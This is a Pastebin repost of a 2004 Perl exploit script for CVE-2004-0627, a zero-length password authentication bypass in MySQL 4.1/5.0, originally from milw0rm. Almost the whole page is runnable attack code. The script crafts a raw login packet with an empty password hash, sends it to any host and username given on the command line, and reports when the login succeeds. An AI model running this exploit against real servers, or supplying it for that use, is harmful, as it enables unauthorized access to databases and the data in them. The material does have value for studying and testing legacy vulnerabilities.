Advertisement
FlyFar

MySQL 4.1/5.0 - Zero-Length Password Authentication Bypass- CVE-2004-0627

May 24th, 2024 (edited)
1,043
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 3.40 KB | Cybersecurity | 0 0
  1. #!/usr/bin/perl
  2. #
  3. # The script connects to MySQL and attempts to log in using a zero-length password
  4. # Based on the vuln found by NGSSecurity
  5. #
  6. # The following Perl script can be used to test your version of MySQL. It will display
  7. # the login packet sent to the server and it's reply.
  8. #
  9. # Exploit copyright (c) 2004 by Eli Kara, Beyond Security
  10. # elik beyondsecurity com
  11. #
  12. use strict;
  13. use IO::Socket::INET;
  14.  
  15. usage() unless ((@ARGV >= 1) || (@ARGV <= 3));
  16.  
  17. my $username = shift(@ARGV);
  18. my $host = shift(@ARGV);
  19. if (!$host)
  20. {
  21.   usage();
  22. }
  23. my $port = shift(@ARGV);
  24. if (!$port)
  25. {
  26.  $port = 3306; print "Using default MySQL port (3306)\n";
  27. }
  28.  
  29. # create the socket
  30. my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
  31. $socket or die "Cannot connect to host!\n";
  32.  
  33. # receive greeting
  34. my $reply;
  35. recv($socket, $reply, 1024, 0);
  36. if (length($reply) < 7)
  37. {
  38.  print "Not allowed to connect to MySQL!\n";
  39.  exit(1);
  40. }
  41. print "Received greeting:\n";
  42. HexDump($reply);
  43. print "\n";
  44.  
  45. # here we define the login OK reply
  46. # my $login_ok = "\x01\x00\x00\x02\xFE";
  47.  
  48. # break the username string into chars and rebuild it
  49. my $binuser = pack("C*", unpack("C*", $username));
  50.  
  51. # send login caps packet with password
  52. my $packet = "\x85\xa6".
  53.              "\x03\x00\x00".
  54.     "\x00".
  55.     "\x00\x01\x08\x00\x00\x00". # capabilities, max packet, etc..
  56.              "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  57.              "\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\x00". # username and pword hash length + NULL hash
  58.              "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; # continue NULL hash
  59.  
  60. substr($packet, 0, 0) = pack("C1", length($packet)) . "\x00\x00\x01"; # MySQL message length + packet number (1)
  61.  
  62. print "Sending caps packet:\n";
  63. HexDump($packet);
  64. print "\n";
  65. send $socket, $packet, 0;
  66.  
  67. # receive reply
  68. recv($socket, $reply, 1024, 0);
  69. print "Received reply:\n";
  70. HexDump($reply);
  71.  
  72. my @list_bytes = unpack("C*", $reply);
  73.  
  74. #print "The fifth byte is: ", $list_bytes[4], "\n";
  75. if (length(@list_bytes) >= 4)
  76. {
  77.  print "Response insufficent\n";
  78. }
  79.  
  80. #if ($reply eq $login_ok)
  81. if ($list_bytes[4] == 0 || $list_bytes[4] == 254)
  82. {
  83.  print "Received OK reply, authentication successful!!\n";
  84. }
  85. else
  86. {
  87.  print "Authentication failed!\n";
  88. }
  89.  
  90. # close
  91. close($socket);
  92.  
  93.  
  94. sub usage
  95. {
  96.     # print usage information
  97.     print "\nUsage: mysql_auth_bypass_zeropass.pl <username> <host> [port]\n
  98. <username> - The DB username to authenticate as
  99. <host> - The host to connect to
  100. [port] - The TCP port which MySQL is listening on (optional, default is 3306)\n\n";
  101.     exit(1);
  102. }
  103.  
  104.  
  105. ###
  106. # do a hexdump of a string (assuming it's binary)
  107. ###
  108. sub HexDump
  109. {
  110.  my $buffer = $_[0];
  111.  
  112.  # unpack it into chars
  113.  my @up = unpack("C*", $buffer);
  114.  my $pos=0;
  115.  
  116.  # calculate matrix sizes
  117.  my $rows = int(@up/16);
  118.  my $leftover = int(@up%16);
  119.  
  120.  for( my $row=0; $row < $rows ; $row++, $pos+=16)
  121.  {
  122.   printf("%08X\t", $pos);
  123.   my @values = @up[$pos .. $pos+15];
  124.   my @line;
  125.   foreach my $val (@values)
  126.   {
  127.    push(@line, sprintf("%02X", $val));
  128.   }
  129.   print join(' ', @line), "\n";
  130.  }
  131.  # print last line
  132.  printf("%08X\t", $pos);
  133.  my @values = @up[$pos .. $pos+$leftover-1];
  134.  my @line;
  135.  foreach my $val (@values)
  136.  {
  137.   push(@line, sprintf("%02X", $val));
  138.  }
  139.  print join(' ', @line), "\n";
  140. }
  141.  
  142. # milw0rm.com [2004-07-10]
  143.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement